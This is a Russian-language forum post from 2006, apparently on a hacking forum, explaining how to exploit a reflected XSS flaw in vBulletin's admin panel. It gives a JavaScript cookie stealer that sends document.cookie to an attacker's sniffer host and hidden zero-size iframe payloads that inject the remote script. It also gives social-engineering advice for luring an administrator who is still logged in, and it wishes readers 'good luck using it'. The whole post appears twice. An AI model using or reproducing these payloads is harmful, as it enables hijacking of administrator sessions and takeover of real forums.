ReanimatoR
06.11.2006, 18:07
На данный момент я разобрал только одну пассивную хсс.
Вот и хочу объяснить подробнее как работать.
Один плюс. Если XSS сработала и он открыл ссылку, то мы можем залесьть в админку, так как сама ХСС находится в админке и он уже в ней... :)
1. Создаем на своем хостинге файл js.js(пусть будет yousite1.ru/js.js), он выглядит так:
img=new Image();img.src="http://Yoursite2.ru/cgi/sniff.cgi?"+document.cookie;
, где http://Yoursite2.ru/cgi/sniff.cgi? - ваш сниффер.
2. Вставляем в любой html файл следующий код:
<iframe src='http://site.ru/vbulletin/admincp/index.php?do=savenavprefs&nojs=0&navprefs="><script%20src=http://yousite1.ru/js.js></script>' WIDTH=0 HEIGHT=0>
Где site.ru - сайт, у который ломаем. vbulletin/admincp - =путь до админки
Теперь даем ему линк на html страницу и ждем куки=)
Примечание1.
Сессия у админа,которого вы ломаете может быть и на http://www.site.ru и на http://site.ru просто(без www), поэтому логичнее сделать сразу два варианта, то есть вставлять лучше такой код:
<iframe src='http://site.ru/vbulletin/admincp/index.php?do=savenavprefs&nojs=0&navprefs="><script%20src=http://yousite1.ru/js.js></script>' WIDTH=0 HEIGHT=0>
<iframe src='http://www.site.ru/vbulletin/admincp/index.php?do=savenavprefs&nojs=0&navprefs="><script%20src=http://yousite1.ru/js.js></script>' WIDTH=0 HEIGHT=0>
Примечание2.
yoursite и yoursite2 могут совпадать, я просто описал, чтобы не путались....
Примечание3.
Лучше всего заранее убедиться, что админ зашел в админку...Это можно сделать так:
Попросить его что-то поменять у Вас в профиле или поискать багу на сайте(кривой скин и т.д. и попросить его поменять...) Ну в общем множестве вариантов.
Удачи в использовании.
Разъясню:
----
НАПАДЕНИЕ ОСУЩЕСТВЛЯЕТСЯ ТОЛЬКО НА АДМИНИСТРАТОРА ФОРУМА(ИЛИ ТЕХ КТО ИМЕЕТ ДОСТУП В АДМИН ПАНЕЛЬ)
----
Сессия администратора должна сохраниться(это примерно минут 10-20 после последнего действия в админ панели...).
------------------------------------------------------------------
Grey: тема закрыта, все сообщения не имеющие информационной ценности удалены, ссылка на тему добавлена в тему [Обзор уязвимостей vBulletin].
Вот и хочу объяснить подробнее как работать.
Один плюс. Если XSS сработала и он открыл ссылку, то мы можем залесьть в админку, так как сама ХСС находится в админке и он уже в ней... :)
1. Создаем на своем хостинге файл js.js(пусть будет yousite1.ru/js.js), он выглядит так:
img=new Image();img.src="http://Yoursite2.ru/cgi/sniff.cgi?"+document.cookie;
, где http://Yoursite2.ru/cgi/sniff.cgi? - ваш сниффер.
2. Вставляем в любой html файл следующий код:
<iframe src='http://site.ru/vbulletin/admincp/index.php?do=savenavprefs&nojs=0&navprefs="><script%20src=http://yousite1.ru/js.js></script>' WIDTH=0 HEIGHT=0>
Где site.ru - сайт, у который ломаем. vbulletin/admincp - =путь до админки
Теперь даем ему линк на html страницу и ждем куки=)
Примечание1.
Сессия у админа,которого вы ломаете может быть и на http://www.site.ru и на http://site.ru просто(без www), поэтому логичнее сделать сразу два варианта, то есть вставлять лучше такой код:
<iframe src='http://site.ru/vbulletin/admincp/index.php?do=savenavprefs&nojs=0&navprefs="><script%20src=http://yousite1.ru/js.js></script>' WIDTH=0 HEIGHT=0>
<iframe src='http://www.site.ru/vbulletin/admincp/index.php?do=savenavprefs&nojs=0&navprefs="><script%20src=http://yousite1.ru/js.js></script>' WIDTH=0 HEIGHT=0>
Примечание2.
yoursite и yoursite2 могут совпадать, я просто описал, чтобы не путались....
Примечание3.
Лучше всего заранее убедиться, что админ зашел в админку...Это можно сделать так:
Попросить его что-то поменять у Вас в профиле или поискать багу на сайте(кривой скин и т.д. и попросить его поменять...) Ну в общем множестве вариантов.
Удачи в использовании.
Разъясню:
----
НАПАДЕНИЕ ОСУЩЕСТВЛЯЕТСЯ ТОЛЬКО НА АДМИНИСТРАТОРА ФОРУМА(ИЛИ ТЕХ КТО ИМЕЕТ ДОСТУП В АДМИН ПАНЕЛЬ)
----
Сессия администратора должна сохраниться(это примерно минут 10-20 после последнего действия в админ панели...).
------------------------------------------------------------------
Grey: тема закрыта, все сообщения не имеющие информационной ценности удалены, ссылка на тему добавлена в тему [Обзор уязвимостей vBulletin].